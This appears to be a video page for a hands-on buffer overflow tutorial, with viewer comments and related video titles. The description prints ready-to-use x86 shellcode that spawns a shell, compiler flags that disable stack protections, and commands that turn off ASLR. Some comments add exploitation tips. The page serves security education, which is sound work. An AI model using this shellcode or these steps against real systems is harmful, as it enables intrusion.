How to exploit a buffer overflow vulnerability - Practical

Показать описание

This tutorial goes over the basic technique of how to exploit a buffer overflow vulnerability with an example.

This tutorial assumes that you already have: basic C knowledge, gdb, gcc and how programs represent memory.

The source code for the program can be downloaded at

The 46 byte shellcode (x86*) used in this program is "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"

The compiling line is gcc -o example -fno-stack-protector -m32 -z execstack example.c
-fno-stack-protector === Removes the canary value at the end of the buffer
-m32 === Sets the program to compile into a 32 bit program
-z execstack === Makes the stack executable

NOTE: If this tutorial is not working it is likely that you have aslr enabled. To disable it run the following command in your terminal
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
When you are finished I strongly recommend you turn it back on with the command
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

* If your computer uses ARM then this won't work... if you don't know what this means then as of 2021 it should work if it's not a Raspberry Pi, phone, or an Apple computer released after 2020.

Рекомендации по теме

Комментарии

to anyone getting :
Cannot insert breakpoint 1.
Cannot access memory at address

the displayed memory addresses when you run disassemble main at first are not correct .
to get the correct ones run the commands as follow:

gdb ./example
run
disassemble main

now you get the correct ones copy it and quit gdb
gdb ./example
break *the address you copied

now running the command (run $(python will work.

Thanks for the video :)

AtlasMTBRider

TL;DR. Most of you will get something like "Cannot access memory at address 0x...."
That's because you have a 64 bit system installed.
To get this work, use the $rsp register instead of $esp.

I must say, this is the best video tutorial I have come across explaining how to exploit a buffer overflow. Well done!

RealKalleAnka

Thanks man, i got a reliable shellcode from your description. I was bugging my head for not spawning a new shell with my shellcode. It worked like a charm with your shellcode.

yaseen

Great job at really explain buffer overflows and how to exploit it.

pberson

Dude! Thank you!!!
I'm studying for the Security + and I didn't understand the concept of Buffer Overflow because I couldn't picture it but thanks to your video I gained better understanding. The visual aspect is of great help to someone like me who knows nothing about software coding and programming.

Thanks lots mate!!!

Arkata

This tutorial is amazing. Thank you so much for the work you put into it

Henry_the_knight

thank you so much man. this video saved me on a homework assignment!

ayanoayumu

You should use GDB to inspect the code and have an idea about the possible attack but since it inserts extra variables for debugging purpose, you'll have to del with the offset introduced.

sorrefly

This really helped me understand the details of buffer overflows, thanks!

annablendermann

this might be the best tutorial ever, but I still couldn't understand my security homework

pennysmith

Thank you so much for this! Practical and easy to understand.

DS-mgzx

Great explanation. Thank you for the details!

Beulzabob

Love this would have loved a little more explanation on the shell code tho would have gladly watched for 30 mins

cursedfox

Great explanation, and concise example. Thanks.

srcmake

Ran the code with the flags you mentioned in description but still facing the same issue of cannot access memory at address. I am using Kali linux 32 bit version in VM Ware. Disabled ASLR. Any solution would be highly appreciated.

shubhamshah

Don't forget to use python 2 not 3. Otherwise the NOP sled will not be created correctly!

pitkes

You didn't mention one needs to make the stack executable for this, with the -zexecstack option to gcc while compiling. I found that the hard way but thanks for the video, it is very informative.

harbaapkabaap

Excellent explanation thank you. Can you advise on how you developed the machine code that you ran to get shell to start.

karimbarakat

impressive skills

thanks for the tutorial !!

Darieee

How to exploit a buffer overflow vulnerability - Practical

how do hackers exploit buffers that are too small?

How to exploit a buffer overflow vulnerability - Practical

Running a Buffer Overflow Attack - Computerphile

How to exploit a buffer overflow vulnerability | Full Practical

How to exploit a buffer overflow vulnerability - Theory

HACKED! How a Buffer Overflow Exploit works, plus Code Red!

Writing a Simple Buffer Overflow Exploit

First Exploit! Buffer Overflow with Shellcode - bin 0x0E

Catching a Buffer Overflow with a Debugger - Exploring How To Exploit the Stack

From Missingno to Heartbleed: Buffer Exploits and Buffer Overflows

How to exploit a buffer overflow vulnerability (security@cambridge screencast)

How to Exploit a Buffer Overflow Vulnerability

First Stack Buffer Overflow to modify Variable - bin 0x0C

What is a Stack Buffer Overflow? Exploring How To Exploit the Stack

How to exploit buffer overruns in C/C++

BASIC Buffer Overflow | Ryan's CTF [13] Everyday I'm Bufferin

Craft a Buffer Overflow exploit! - Brainpan Walkthrough EP3

Cyber Security How can an attacker exploit a buffer overflow vulnerability

Exploiting Simple Buffer Overflows on Win32 : Exploit to Meterpreter

Basics of buffer overflow - Deep dive into exploit writing (exploit development)

What is a Buffer Overflow Attack?

Linux Buffer Overflow - Exploit Development 9

Exploit Writing | Buffer Overflow | Reverse Shell Windows 10

Buffer overflow (off by 1) exploit